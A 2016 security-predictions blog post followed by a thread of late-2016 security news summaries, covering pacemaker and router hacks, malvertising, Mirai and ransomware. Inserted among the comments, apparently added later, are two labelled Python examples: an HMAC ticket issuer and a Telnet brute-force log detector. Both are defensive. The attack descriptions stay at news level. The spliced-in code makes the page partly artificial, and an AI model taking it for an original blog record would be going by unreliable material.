Here are my predictions for trends in information security and cyber security for year 2016.
Year 2015 was pretty bad for information security, and I would say that the trend is worrying. So I expect that 2016 will bring many information security challenges. If you want to keep yourself up at night, spend some time reading about the latest developments in cybersecurity. In 2015 airplanes were hacked, cars were hacked, and vulnerabilities were found in a breathtaking range of sensitive equipment, from TSA locks to voting booths to medical devices. The big picture is even scarier. Former NSA Director Mike McConnell suspects China has hacked “every major corporation” in the US. Those problems will continue in 2016, and new targets for attacks will be found. The system is broken. It isn’t keeping us, our companies, or our government safe. Worse yet, no one seems to know how to fix it.
Attacks through networks are becoming more common all the time. It will be hard to protect against targeted attacks. Hackers will not only customize malware, but will increasingly use sophisticated phishing and social engineering tricks to gain access to sensitive data. Attackers usually cover their tracks carefully, so identifying who is behind an attack can be very difficult. Behind targeted attacks there are usually professional criminals. Criminals do not respect geographical borders, and hence attacks are spread evenly everywhere. Companies will struggle to absorb the security threats of combined PC and mobile devices in 2016.
EU information security decisions made in late 2015 will have an impact on what comes in 2016: the new EU data protection legislation package was approved, and the EU Court of Justice ruled that the Safe Harbor procedure is invalid. This means that transfers of personal data from EU countries to the United States under Safe Harbor are a violation of law; you need some other agreement for this. The situation will probably get clarified during 2016. Data protection legislation changes will lead to increased fines for the unprepared. Legal uncertainty and big fines are a toxic cocktail for some companies. The combination of stiff penalties and ambiguously worded provisions in the new EU-wide data protection law, which would replace a patchwork of 28 national laws, raises daunting prospects for companies operating in Europe.
After the huge amount of user information leaked in 2015 from all kinds of Internet services, cloud companies will face challenges in gaining trust in their security. You might have just dared to trust “the right cloud services,” since from the traditional information security point of view they seem in principle to be mostly okay, but the privacy issues raised now come on top of that.
New environments will bring new threats. New operating system versions mean that administrators and users are less familiar with the environments. IPv6 will get more widely used, and the security of IPv6 networks is different from IPv4. Organizations are moving to virtualized environments, which are complex and create network layers that can become an attack vector. Growing network virtualization functionality and programmability are both an opportunity and a threat to security. Cyber security research will be important in 2016, as 5G networks will be critical infrastructure on top of which, for example, transport, industry, health and the new operators set up their business around 2020.
The huge amount of information security information is becoming harder and harder to manage in 2016. A key problem, in security revelations as in all other news coverage, is the exponential growth of knowledge. There are a variety of news summaries produced on a daily basis, but they are not enough to get a good picture of what is happening. There are bigger and smaller news items, the impact of which is at times very difficult to assess. SMBs will become a bigger target for cybercriminals. Network and security professionals continue to be among the toughest IT talent to find and hire.
Old-style network security focused on perimeter defense is not enough in 2016. The old mantras “encrypt everything” and “secure the perimeter” are not enough. One deceptive truth seems to drive much of the cybersecurity industry down a rabbit hole: if you keep bad actors and bad software out of your system, you have nothing to worry about. It does not work like that anymore. As perimeter security gets stronger, malicious actors are looking for easier entry points to compromise an organisation through the breadth of its digital attack surface. Now malicious actors target “endpoints” (any device or sensor connected to a network) to break into that network. Traditional sandboxing will no longer protect against the growing malware landscape. Today, most private networks have far too many endpoints to properly secure. In an age of “Bring Your Own Device,” the cloud, remote access, and the Internet of Things, there are too many vulnerabilities hackers can exploit. Keep in mind that everything connected to the Internet can, and will, be hacked. To address those threats in 2016, security experts should assume compromise (that hackers and malware already have breached their defenses, or soon will) and instead classify and mitigate threats. In addition to the public key infrastructure lock-and-key system, you will also need an integrity solution that acts like an alarm. To protect against advanced threats, security professionals will increase their reliance on centralized security management solutions. You need to have prioritization and response plans for various kinds of breaches, with a strong focus on integrity.
Law enforcement versus Silicon Valley tension will continue to be strong throughout 2016. In 2015, law enforcement and politicians on both sides of the Atlantic lined up to repeatedly complain that the web was “going dark” as a result of end-to-end encryption and that this was hampering the investigation of terrorism and other serious crimes. Technologists and cryptographers argue that governments are trying to weaken encryption by demanding some form of privileged access for government. It’s not clear how much encryption the NSA can break. With renewed focus on how encrypted messages can be used to plot terrorist attacks, President Barack Obama’s administration is stepping up pressure on the tech sector to help in the battle. Privacy remains a major counter-argument. It seems that governments lie about encryption backdoors. Encryption systems weakened by mandated backdoors would not be effective in fighting the terrorists that governments invoke as their reason for wanting those backdoors in the first place.
But this does not stop some government officials from demanding such things, with varying success in different countries. Another fact is that the existence of coded communications is a reality, and the U.S. may not be able to do much about it because nearly everyone living in modern society uses it: encryption protects your bank information, prevents your password from being stolen when you log into a website, and allows all e-commerce transactions to take place securely. Encryption weakened by mandated backdoors would put all of us at an enormous risk of exposure from data breaches and associated online risks. The truth in 2016 is that any form of privileged access for government (i.e., a backdoor) would inevitably weaken crypto-systems and make them more vulnerable to attacks by foreign governments’ intelligence agencies as well as criminals; Juniper’s VPN security hole is proof that government backdoors are bonkers. Encryption backdoors would be a gleeful win-win for terrorists and a horrific lose-lose for you: the bad guys having strong protections for their data, and the rest of us not. Poorly thought-out and crude surveillance techniques could have a devastating effect on a country’s internet security; for example, Kazakhstan will force its citizens to install internet backdoors by requiring all Internet users to install a state-issued root certificate by January 1, 2016.
Google, Mozilla and Microsoft are pushing for an early SHA-1 crypto cutoff that could happen in 2016 instead of the earlier planned January 1, 2017, due to recent research showing that SHA-1 is weaker than previously believed, because it’s been cracked without enormous effort. Mozilla, Microsoft and now Google are all considering bringing the deadline forward by six months to July 1, 2016. SHA-2 is going to be used as the replacement function for SHA-1. Websites like Facebook and those protected by CloudFlare have implemented a SHA-1 fallback mechanism for those systems that do not support SHA-2. Chrome will start displaying errors if SHA-1 certificates are employed in early 2016 and will completely stop supporting SHA-1 certificates at the end of 2016.
The use of blockchain technology, a permissionless distributed database based on the bitcoin protocol that runs across a global network of independent computers, will spread more widely than just Bitcoin virtual money. With bitcoin, the blockchain tracks the exchange of money, but it can also track the exchange of anything else that holds value, including stocks, bonds, and other financial securities. Overstock has already used the blockchain to issue private bonds. The Securities and Exchange Commission has approved a plan from online retailer Overstock.com to issue company stock via the Internet, signaling a significant shift in the way financial securities will be distributed and traded in the years to come. Overstock built its technology under the aegis of a subsidiary called TØ.com, and it plans to offer this “cryptosecurity” tech as a service to other businesses. Nasdaq OMX, the company behind the Nasdaq stock exchange, is using the blockchain to oversee the exchange of private stock. Also, several major companies from across both the technology and financial industries, including IBM, Intel, and Cisco as well as the London Stock Exchange Group and big-name banks JP Morgan, Wells Fargo, and State Street, have joined forces with the Linux Foundation to create an alternative to the blockchain.
The use of disk encryption will increase, and there are different ways to do it with different security levels. Microsoft has introduced Windows 10 disk encryption where the keys are uploaded to Microsoft. This approach has some advantages and disadvantages. The gold standard in disk encryption is end-to-end encryption, where only you can unlock your disk. This is what most companies use, and it seems to work well. It protects data in case your device is lost or stolen. But what if you forget or lose your key? There are certainly cases where it’s helpful to have a backup of your key or password, so keeping a backup of your recovery key in your Microsoft account could be genuinely useful for probably the majority of users that don’t have high security needs. The disadvantage of this approach is that your computer is now only as secure as that database of keys held by Microsoft, which means it may be vulnerable to hackers, foreign governments, and people who can extort Microsoft employees.
Weak and leaked passwords are still a huge security problem in 2016. Passwords are often the weakest part when it comes to securing users’ accounts, as many don’t use complex passwords or they reuse the same password across services. Two-factor authentication (like using a USB stick with a secret token or entering a code sent via text message to your phone) can help to increase security, but many users also find this to be a hassle, as it introduces an additional step to the login process.
Google has begun testing a login system that uses phone notifications for authentication instead of passwords: users authenticate by responding to a notification sent to their smartphone. The idea is similar to Yahoo’s recently launched “Account Key,” which also offers a password-free means of signing in involving a push notification sent to your phone that then opens an app where you approve the log-in.
The smartphone will become a more and more security-critical part of your life. “Increasingly, individuals and organisations are adopting password managers and multi-factor authentication technologies to plug some of the holes in password-based authentication.” “We foresee a world where practically everyone uses their smartphone as a multi-factor authentication element. In this world, the smartphone becomes your most valuable asset: something that enables you to unlock your life online and a target for attackers seeking to access your services.”
Expect that the number of mobile vulnerabilities will only grow in 2016. In 2016 we will see increasing numbers of cyber criminals using mobile applications to spread malware. Mobile presents an easy target for cyber criminals, because it is an attack surface that is open and extremely difficult to defend once an app has been released. Android threats will become more than just headline-grabbers. Will 2016 be the year iOS malware goes mainstream?
Critical infrastructures will be highly targeted in 2015. SCADA and ICS networks were not designed for security. Attacks against these systems have increased in recent years, and I expect this trend to only get worse. There are still many companies that run their critical systems on Windows XP, as “there are some people who don’t have an option to change.” Many times the OS is running in automation and process control systems that run business- and mission-critical systems, both in private sector and government enterprises. For example, the US Navy is using the obsolete operating system Microsoft Windows XP to run critical tasks. It all comes down to money and resources, but if someone is obliged to keep something running on an obsolete system, it is the completely wrong approach to information security.
Cars were hacked at a record rate in 2015, and they will be hacked at least at the same rate in 2016. Modern cars feature more gadgetry and connected systems, and this makes vehicles just as vulnerable to today’s threats and attacks. I Am The Cavalry has published a Five Star Cyber Safety Framework to mitigate this threat in cars; hopefully car component makers study it.
IoT and smart devices are still at risk. The Internet of Things will continue to emerge, and businesses will need to think about how to protect their smart devices and prepare for the wider adoption of IoT. IoT platforms are not yet the weapon of choice for commercial malware authors, but businesses beware. Wearables won’t be safe either, as they are built using largely the same, too often vulnerable, technologies as other IoT systems. IoT security is still in its infancy in 2016.
Cyber criminals became more active in 2015, particularly in malicious ransom schemes. The ransom-malware problem will continue to be big in 2016. Commercial malware authors will continue to invest heavily, and exploit kits will continue to dominate on the web. Ransomware today is big business. Ransomware takes control of a computer and holds it hostage until the victim pays, usually in the digital currency Bitcoin. As a remedy against ransom-malware, I recommend ensuring that your IT support or service provider has the data backup and restore procedure operational, practiced and tested. You may need it in 2016 to get your data back without considering paying criminals. To date ransomware has hit Windows users hardest, although Android and MacOS users are now also facing similar extortion.
Ransomware will continue to dominate in 2016, and it is only a question of time before we see things beyond data being ransomed. We have already seen websites being held to ransom with DDoS. Intel’s McAfee Labs also noted a huge spike in ransomware in early 2015, and worries about ransomware in the IoT space, including medical devices. And Kaspersky predicts the “nightmare of ransomware” to continue and “spread to new frontiers” in 2016. The article Ransomware Is Coming to Medical Devices tells that, according to a report released recently by Forrester Research, the number one cybersecurity prediction for 2016 is: “We’ll see ransomware for a medical device or wearable.” “It’s definitely feasible from a technical standpoint.” Networked medical devices save lives. Despite the hacking risk, it’s an informed trade-off. Medical device ransomware would be a modern form of highway robbery with lives at stake.
Keep in mind that everything connected to the Internet can, and will, be hacked. In 2016, if you’re not paranoid, you’re crazy. As government agencies and tech companies develop more and more intrusive means of watching and influencing people, how can we live free lives? Unfortunately I don’t have a solution for that.
2,232 Comments
Tomi Engdahl says:
Nintendo Offers $20,000 for Vulnerabilities in 3DS Consoles
http://www.securityweek.com/nintendo-offers-20000-vulnerabilities-3ds-consoles
Nintendo announced on Monday the launch of a new bug bounty program for its 3DS handheld gaming systems. The company is prepared to offer between $100 and $20,000 for vulnerabilities found in the product.
The bug bounty program, hosted on HackerOne, is only for 3DS consoles – the company says it’s currently not interested in vulnerabilities affecting other platforms or services.
Nintendo is willing to pay for system flaws, such as privilege escalation or takeover issues affecting ARM11 and ARM9 processors. The company also encourages researchers to report vulnerabilities found in Nintendo applications, and hardware weaknesses that can be leveraged to obtain security keys or clone systems at a low cost.
Through its bug bounty program, Nintendo aims to prevent piracy, cheating and dissemination of inappropriate content to children.
https://hackerone.com/nintendo
Tomi Engdahl says:
Hacking Europe’s Smart Cities
http://www.securityweek.com/hacking-europes-smart-cities
Municipal planners in Europe are embracing digital technologies to deliver various services to the citizens. Smart-city services connect Internet-enabled sensors on buses, in rental bike racks, or parking meters, and then make use of an app or SMS with the citizen’s smartphone for payment. But Europe’s rich hacking culture has makers and breakers poking and prodding at these new systems every day. Many can figure out how to hack the services using simple techniques like replay to get free services or, in some cases, make a little bit of money.
This might sound like a lot of trouble to go through for free parking, but then students (and other young “maker” types) always have more time than money.
“At home you could make tickets to park your car in front of your home, or you could make some tickets for where you are going. Or perhaps you’re hosting a party and feel like handing out free parking tickets to your guests. And some use a WiFi printer to print tickets in their car, so all they have to do is cut them to size.” —a young hacker familiar with the app
Another Benelux city uses an SMS-based system to distribute one-hour tickets for the public transportation system. Unlike the parking receipts, the SMS tickets have a unique identifier, so they can’t actually be cloned. But hackers there made a web app that allows them to share tickets; one user pays for the first ticket, and if he only uses the transport for 20 minutes, there’s still 40 minutes left. That 40 minutes can be distributed to anyone else using the app. At the end of the month, each app subscriber receives a bill from the app (payable in Bitcoin, of course) for their distributed tickets. In a way, it’s a neat little system to claw back unused travel costs.
Another low-value hack involves the redemption of recyclable bottles at a grocery store. When a consumer finishes a case of beer or soft drinks, he can return the case and scan the barcode to receive a cash redemption.
In talking with Europeans, there are two perspectives on these citizen hacker activities. “It’s simple fraud,” said one man at a SecureLink conference in Belgium. A man opposite him disagreed: “It’s just gaming a system, and a citizen is within his right to take advantage where he can.”
The generation of city planners building the new smart cities need to remember this: humans are good at gaming any system. Actually, not good; they’re great. Give a group of people a set of rules, and they will quickly figure out how to beat the system.
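The difference the article draws between the clonable parking receipts and the SMS tickets with a unique identifier comes down to two checks at the point of redemption: is the ticket body authentic, and has this id been presented before. As an added example (not from the article or any city’s system), a hypothetical issuer in Python that authenticates the ticket body with HMAC-SHA256 and refuses ids it has already redeemed:

```python
import hashlib
import hmac
import json
import secrets
from typing import List, Tuple

# Added example, not from the article. Hypothetical issuer: the ticket body
# (unique id, zone, expiry) is authenticated with HMAC-SHA256 so it cannot be
# forged or edited, and the verifier records redeemed ids so a copied ticket
# (the parking-receipt replay described above) is refused the second time.


class TicketIssuer:
    def __init__(self, key: bytes) -> None:
        self._key = key
        self._redeemed = set()  # server-side state: ids already presented

    def _tag(self, raw: bytes) -> str:
        return hmac.new(self._key, raw, hashlib.sha256).hexdigest()

    def issue(self, zone: str, minutes: int, now: float) -> str:
        """Return a printable ticket: hex(body) + '.' + hex(HMAC tag)."""
        body = {"id": secrets.token_hex(8), "zone": zone,
                "exp": int(now) + 60 * minutes}
        raw = json.dumps(body, sort_keys=True, separators=(",", ":")).encode()
        return raw.hex() + "." + self._tag(raw)

    def redeem(self, ticket: str, now: float) -> Tuple[bool, str]:
        """Accept a ticket at most once, and only if unmodified and unexpired."""
        try:
            raw_hex, tag = ticket.split(".", 1)
            raw = bytes.fromhex(raw_hex)
        except ValueError:
            return False, "malformed"
        # Constant-time compare: a forged or edited body fails here.
        if not hmac.compare_digest(self._tag(raw), tag):
            return False, "bad signature"
        body = json.loads(raw)
        if now > body["exp"]:
            return False, "expired"
        if body["id"] in self._redeemed:
            return False, "replayed"  # the same ticket presented again
        self._redeemed.add(body["id"])
        return True, "ok"


def edited_copy(ticket: str, new_zone: str) -> str:
    """Change the zone in a ticket body but keep the old tag, to show the
    signature check rejects an edited ticket."""
    raw_hex, tag = ticket.split(".", 1)
    body = json.loads(bytes.fromhex(raw_hex))
    body["zone"] = new_zone
    raw = json.dumps(body, sort_keys=True, separators=(",", ":")).encode()
    return raw.hex() + "." + tag


def demo() -> List[Tuple[bool, str]]:
    """Walk one ticket through the failure modes; times are constructed."""
    issuer = TicketIssuer(secrets.token_bytes(32))
    t0 = 1_480_000_000.0  # constructed "now" in epoch seconds
    ticket = issuer.issue("zone-A", 60, t0)
    late = issuer.issue("zone-A", 60, t0)
    return [
        issuer.redeem(ticket, t0 + 10),                    # (True, "ok")
        issuer.redeem(ticket, t0 + 20),                    # (False, "replayed")
        issuer.redeem(edited_copy(ticket, "zone-B"), t0),  # (False, "bad signature")
        issuer.redeem(late, t0 + 3601),                    # (False, "expired")
        issuer.redeem("not-a-ticket", t0),                 # (False, "malformed")
    ]


if __name__ == "__main__":
    for ok, reason in demo():
        print(ok, reason)
```

The SMS ticket-sharing app from the article is not stopped by these two checks alone; binding the id to the purchaser’s account at issue time is the additional step that would be needed.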
Tomi Engdahl says:
Fatal flaws in ten pacemakers make for Denial of Life attacks
Brit/Belgian research team decipher signals and devise wounding wireless attacks
http://www.theregister.co.uk/2016/12/01/denial_of_life_attacks_on_pacemakers/
A global research team has hacked 10 different types of implantable medical devices and pacemakers finding exploits that could allow wireless remote attackers to kill victims.
Eduard Marin and Dave Singelée, researchers with KU Leuven University, Belgium, began examining the pacemakers under black box testing conditions in which they had no prior knowledge or special access to the devices, and used commercial off-the-shelf equipment to break the proprietary communications protocols.
From the position of blind attackers the pair managed to hack pacemakers from up to five metres away gaining the ability to deliver fatal shocks and turn off life-saving treatment.
The wireless attacks could also breach patient privacy, reading device information disclosing location history, treatments, and current state of health.
“We deliberately followed a black-box approach mimicking a less-skilled adversary that has no prior knowledge about the specification of the system.
“Using this black-box approach we just listened to the wireless communication channel and reverse-engineered the proprietary communication protocol. And once we knew all the zeros and ones in the message and their meaning, we could impersonate genuine readers and perform replay attacks etcetera.”
“Adversaries may eavesdrop the wireless channel to learn sensitive patient information, or even worse, send malicious messages to the implantable medical devices. The consequences of these attacks can be fatal for patients as these messages can contain commands to deliver a shock or to disable a therapy.”
On the (in)security of the Latest Generation Implantable Cardiac Defibrillators and How to Secure Them
https://www.esat.kuleuven.be/cosic/publications/article-2678.pdf
Tomi Engdahl says:
Face to face: What keeps security guru Harri Hursti awake at night? “A dangerous universal device that can destroy your life”
Security expert Harri Hursti believes that smartphone security is in a bad way.
An internationally respected security consultant, Harri Hursti, arrives for an interview.
Harri Hursti is concerned in particular about mobile phone data security, because human life is now in the smartphone. It is ugly if criminals can hack the phone.
- There is online banking, remote payments, and all personal information. Also e-mail, with which different passwords are reset, is connected to the phone. You lose your whole life very quickly if you lose your phone. The mobile phone is a dangerous universal device that can destroy the whole of your life. When it is done electronically, you do not even know that you are a victim, he says.
According to Hursti, cybercrime and identity theft related to mobile phones in particular are growing in the future.
- There are many ways to steal money from you. The phone is wonderful, because it is the key to all forms of milking you for money, Hursti says sarcastically.
- The safety of wireless networks is what it is. When the mobile phone has an Internet connection, it will automatically check e-mails and Facebook messages, and this handshake may get caught. There are many techniques by which SSL or TLS can be disabled or removed from a connection.
He says that a criminal does not need any special skills, as technology and services can be purchased today from other criminals as a complete package: malicious programs are tailored per application, and payment is handled conveniently with a stolen credit card.
- Criminals can do it even for free. They put their own part into the program and say: spread this bank theft program, and our own grouch goes in it. It will only be activated 90 days later; that is, you will first clean up the bank, and then we sell them in the secondary market offerings.
Criminals steal your identity and open accounts or make an insurance claim in your name; data stolen from your mobile phone or computer is used to squeeze money from you; a captured cell phone is used to send premium SMS messages that you get billed for.
If you’re lucky, just your money and your information are stolen.
“It is the end of life when you are the accused”
- The motive may also be revenge. What if child pornography is put on your phone without your knowledge? It is such a strong indictment and such an emotional thing that at that point friends will be lost and it is difficult to find a lawyer. It is extremely easy to put child pornography on a phone. It is the end of life when you are the accused, Hursti says.
The threat is already known. It rose to the surface, for example, last year when the hacking tool vendor Hacking Team was itself compromised. Code revealed from the firm was first interpreted as a way to download child pornography onto the victims’ devices.
This code does not appear to have been used and may not even have been capable of staging the victims as users of child pornography, but the threat is quite real in itself.
- If there is no other argument about security, then it is better to get anti-virus software for the phone. Also, VPN tunneling on the phone (an encrypted connection built between two different systems) can help a little bit, but it does not help with everything, Hursti says.
Sources:
http://www.iltasanomat.fi/digitoday/tietoturva/art-2000004895127.html?ref=rss
http://yle.fi/uutiset/3-9324782
Tomi Engdahl says:
TalkTalk’s wi-fi hack advice is ‘astonishing’
http://www.bbc.com/news/technology-38223805
TalkTalk’s handling of a wi-fi password breach is being criticised by several cyber-security experts.
The BBC has presented the company with evidence that many of its customers’ router credentials have been hacked, putting them at risk of data theft.
The UK broadband provider confirmed that the sample of stolen router IDs it had been shown was real.
But it is still advising users that there is “no need” to change their routers’ settings.
A cyber-security advisor to Europol said he was astounded by the decision.
“If TalkTalk has evidence that significant numbers of passwords are out in the wild, then at the very least they should be advising their customers to change their passwords,” said the University of Surrey’s Prof Alan Woodward.
“To say they see no need to do so is, frankly, astonishing.”
A spokeswoman for TalkTalk said that customers could change their settings “if they wish” but added that she believed there was “no risk to their personal information”.
She referred the BBC to another security expert. But when questioned, he also said the company should change its advice.
The BBC was subsequently contacted by someone who said he had access to a database of 57,000 router IDs that had been scraped before any fix had been rolled out.
He did not reveal his identity, but agreed to share a sample of the credentials that had been harvested.
The list contained details of about 100 routers including:
• their service set identifier (SSID) codes and media access control (MAC) addresses. These can be entered into online tools that reveal the physical location of the routers
• the router passwords, which would allow someone who travelled to the identified property to access the wi-fi network
The source said he wanted to highlight the problem because other more malevolent actors might have carried out a similar operation.
Prof Alan Woodward said once a hacker was outside a vulnerable property, they could:
• snoop in the resident’s data, which might be clearly visible or encrypted in ways that still allowed the original information to be easily recovered
• use the internet connection to mount an onward attack. The hacker could do this to hide their own identity or to co-opt the router to join an army of other compromised equipment in later DDoS (distributed denial of service) attacks
• log in to the router as the administrator and mount a “man in the middle attack”, where apparently secure communications could be listened in on
• substitute the router’s firmware with a modified version that provided a backdoor for later access even if the device was reset
‘Fast and loose’
TalkTalk’s spokeswoman referred the BBC to Steve Armstrong, a cyber-security instructor that she said would support it on the matter.
He said the risk to an individual user was relatively low.
“If you look at the average home user and what is on their home network, that would be exposed to an attacker,… then there is not a great deal.
“The risk is probably no higher than using a [coffee shop's] open wi-fi network.”
But he added that he still felt TalkTalk was giving the wrong advice.
“Part of my pushback to them is that they should be telling people, ‘You need to change your password,’” he said.
Boy, 17, admits TalkTalk hacking offences
http://www.bbc.com/news/uk-37990246
A 17-year-old boy has admitted hacking offences linked to a data breach at the communications firm TalkTalk, claiming he was “just showing off” to friends.
Norwich Youth Court was told he had used hacking tool software to identify vulnerabilities on target websites.
The data haul netted email addresses, names and phone numbers, as well as 21,000 unique bank account numbers and sort codes.
The boy pleaded guilty to seven charges and will be sentenced next month.
‘Relentless focus’
TalkTalk was fined a record £400,000 last month for security failings which allowed customers’ data to be accessed “with ease”.
The attack was branded a “car crash” by former information commissioner, Christopher Graham.
The company claimed the hack cost the firm £42m but has since reported a surge in half-year profits.
It said it also lost 98,000 broadband customers in the first half of the year, though this was largely offset by 69,000 new customers signing up.
Tomi Engdahl says:
Massive Stealthy Malvertising Campaign Uncovered
By Kevin Townsend on December 07, 2016
http://www.securityweek.com/massive-stealthy-malvertising-campaign-uncovered
A stealthy malvertising campaign has been flying under the radar for the last few months, targeting millions of readers visiting popular and mainstream news sites. The campaign is notable for stealth bordering on paranoia from the threat group, probably AdGholas.
In July 2016, Proofpoint published an analysis of a massive AdGholas malvertising campaign that it described as “using a sophisticated combination of techniques including sophisticated filtering and steganography.” It added that AdGholas had ceased operation following exposure, but “the scale and sophistication of this operation demonstrate the continued evolution and effectiveness of malvertising.”
Ultimately, the hidden code leads to the Astrum exploit kit — but neither automatically nor necessarily. The malicious code first uses a known Internet Explorer vulnerability CVE-2016-0162 to check for any sign of monitoring or analysis. If it detects a sandbox, or virtualization or certain security products it stops. Otherwise it sets up a one pixel iframe and redirects, via TinyURL, to the EK landing page.
The EK checks for Internet Explorer and loads a Flash file with three encrypted exploits. If it detects a vulnerable Flash version, the relevant exploit is run — otherwise, once again, it stops. If successful, writes ESET in an accompanying overview post, “the bad guys have all they need to download and execute the malware of their choice. Some of the payloads we analyzed include banking trojans, backdoors and spyware, but the victims could end up facing a nasty ransomware attack, for example.”
Tomi Engdahl says:
Hacker Holiday Havoc
http://www.securityweek.com/hacker-holiday-havoc
It’s that time of year again…when consumers, retailers and manufacturers need to understand and be alert to the latest cyber attacks that threaten to dampen the spirit and excitement of the holidays. This year we’re seeing two twists on some tried and true tactics that are cause for concern among the online gaming industry and retailers.
Gaming industry and DDoS
The use of botnets comprised of compromised IoT devices (cameras, DVRs, routers or other internet-connected hardware) is not a new development. But the recently discovered Mirai malware involved in attacks that targeted Krebs on Security, the French Internet Service Provider OVH, DynDNS and a mobile telecommunications provider in Liberia, have been some of the largest distributed denial of service (DDoS) attacks measured to date.
These attacks highlight the inherent vulnerability of basing network infrastructure around centralized DNS providers and the potential power of large IoT botnets to enable low capability actors to launch high impact attacks. Mirai spreads by scanning for IoT devices operating Telnet – a network protocol that allows a user on one computer to log onto another computer that is part of the same network – and then uses the default credentials in an attempt to brute-force access to the device.
Here are a few tips for how the gaming industry can protect itself and its customers:
• Change access credentials for devices and implement complex passwords.
• Evaluate your dependence on DNS, specifically for your most critical domains, and investigate the use of multiple DNS providers.
• Develop a DDoS process and review monitoring capabilities; to minimize downtime it is important to quickly identify the attack, characterize the attack traffic and take the appropriate action.
• Consider disabling all remote access to devices and perform administrative tasks internally – instead of Telnet, FTP and HTTP, use SSH, SFTP and HTTPS.
FastPOS malware aimed at retailers
POS malware is clearly under active development. To prevent and mitigate damage from such attacks retailers can:
• Conduct audits, penetration testing, assessments and red teaming exercises to understand your risk posture and attack surface.
• Consider PoS systems and networks as vital extensions of your enterprise environments; the technology that is used to protect the enterprise should be leveraged on PoS systems and networks where possible and, if not possible, comparable alternates should be sought out.
• Adopt technologies that are becoming more commonplace, such as chip and pin.
• Share intelligence with peers, for example in the form of an ISAC, for the betterment of the industry.
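The Mirai section above describes a spread mechanism that is very visible on the device itself: a burst of Telnet logins with default credentials, usually followed by one success. As an added example (not code from the article or from any vendor), here is a small detector that runs over constructed busybox-style telnetd syslog lines and flags sources that exceed a failure threshold inside a sliding window, reporting whether a success followed the burst. The log format and the hostname `cam01` are assumptions for the sample; real devices log in many different formats, so the regex is the part you would adapt.

```python
"""Flag Telnet credential brute-forcing in device syslog (constructed sample)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log lines, not captured from a real device. The format is
# a hypothetical busybox-style telnetd authentication log.
SAMPLE_LOG = """\
Dec  7 10:00:01 cam01 telnetd[412]: login failed for 'root' from 203.0.113.9
Dec  7 10:00:02 cam01 telnetd[412]: login failed for 'admin' from 203.0.113.9
Dec  7 10:00:02 cam01 telnetd[412]: login failed for 'root' from 203.0.113.9
Dec  7 10:00:03 cam01 telnetd[412]: login failed for 'user' from 203.0.113.9
Dec  7 10:00:03 cam01 telnetd[412]: login failed for 'support' from 203.0.113.9
Dec  7 10:00:04 cam01 telnetd[412]: login succeeded for 'admin' from 203.0.113.9
Dec  7 10:05:00 cam01 telnetd[412]: login failed for 'admin' from 192.0.2.15
Dec  7 10:05:30 cam01 telnetd[412]: login succeeded for 'admin' from 192.0.2.15
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ telnetd\[\d+\]: "
    r"login (?P<result>failed|succeeded) for '(?P<user>[^']*)' from (?P<ip>[\d.]+)$"
)


def parse(log_text):
    """Return a list of (timestamp, result, user, source_ip) tuples."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated syslog line
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # year-less syslog stamp
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Return {ip: (total_failures, distinct_users, success_after_burst)} for
    every source with at least `threshold` failed logins inside any
    `window_seconds` window. A success after the burst is the strongest
    indicator that a default credential worked."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e[0])
        fails = [e for e in evs if e[1] == "failed"]
        # Sliding window over failure timestamps: largest burst within the window.
        start, max_burst = 0, 0
        for end in range(len(fails)):
            while (fails[end][0] - fails[start][0]).total_seconds() > window_seconds:
                start += 1
            max_burst = max(max_burst, end - start + 1)
        if max_burst >= threshold:
            users = {e[2] for e in fails}
            success_after = any(
                e[1] == "succeeded" and e[0] >= fails[-1][0] for e in evs
            )
            findings[ip] = (len(fails), len(users), success_after)
    return findings


if __name__ == "__main__":
    for ip, (n_fail, n_users, success) in detect_bruteforce(parse(SAMPLE_LOG)).items():
        print(f"{ip}: {n_fail} failures across {n_users} usernames; success after burst: {success}")
```

The single failed login from 192.0.2.15 followed by a success is what an operator mistyping a password looks like and is left alone; the five-failure burst across four usernames from 203.0.113.9, capped by a success, is the credential-list pattern the article describes. Pairing this with the tips above (disable Telnet, or at least change the default credentials) turns the detector into a way of confirming that the hardening actually took effect.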
Tomi Engdahl says:
NSA, GCHQ Have Been Intercepting In-Flight Mobile Calls For Years
https://yro.slashdot.org/story/16/12/07/2141241/nsa-gchq-have-been-intercepting-in-flight-mobile-calls-for-years
American and British spies have since 2005 been working on intercepting phone calls and data transfers made from aircraft, France’s Le Monde newspaper reported on Wednesday, citing documents from former U.S. spy agency contractor Edward Snowden. According to the report, also carried by the investigative website The Intercept, Air France was targeted early on in the projects undertaken by the U.S. National Security Agency (NSA) and its British counterpart, GCHQ, after the airline conducted a test of phone communication based on the second-generation GSM standard in 2007.
U.S. and UK intelligence target airborne phone calls: report
http://www.reuters.com/article/us-airlines-data-surveillance-idUSKBN13W2Q0
Tomi Engdahl says:
Silver screen script hacker and dox douche gets 5 years in US cooler
Hello [celebrity], please reset your password
http://www.theregister.co.uk/2016/12/08/silver_screen_script_hacker_and_dox_douche_gets_5_years_in_us_cooler/
Bahamas man Alonzo Knowles has been sentenced to five years' jail for hacking the email accounts of celebrities to steal and sell unreleased television and movie scripts, music, financial documents, and pornographic self footage.
Knowles pleaded guilty to criminal copyright infringement and identity theft in May and was sentenced this week by US District Judge Paul Engelmayer.
The 24-year-old hacker stole at least 25 unreleased TV and movie scripts including upcoming Tupac flick All Eyez On Me after tricking celebrities into filling their usernames and passwords into phishing emails.
Tomi Engdahl says:
Tests Reveal the Best Antivirus to Clean Up an Infected Windows PC
AV-TEST reveals most effective security products in case of a malware infection on a Windows 7 computer
http://news.softpedia.com/news/tests-reveal-the-best-antivirus-to-clean-up-an-infected-windows-pc-510784.shtml
Tomi Engdahl says:
Safety and Cybersecurity — You Can’t Have One Without the Other
Security planning needs to include safety. The two can no longer be separate concerns.
http://www.designnews.com/cyber-security/safety-and-cybersecurity-you-cant-have-one-without-other/61645859446201?cid=nl.x.dn14.edt.aud.dn.20161205.tst004c
Tomi Engdahl says:
Creepy Wireless Stalking Made Easy
http://hackaday.com/2016/12/04/creepy-wireless-stalking-made-easy/
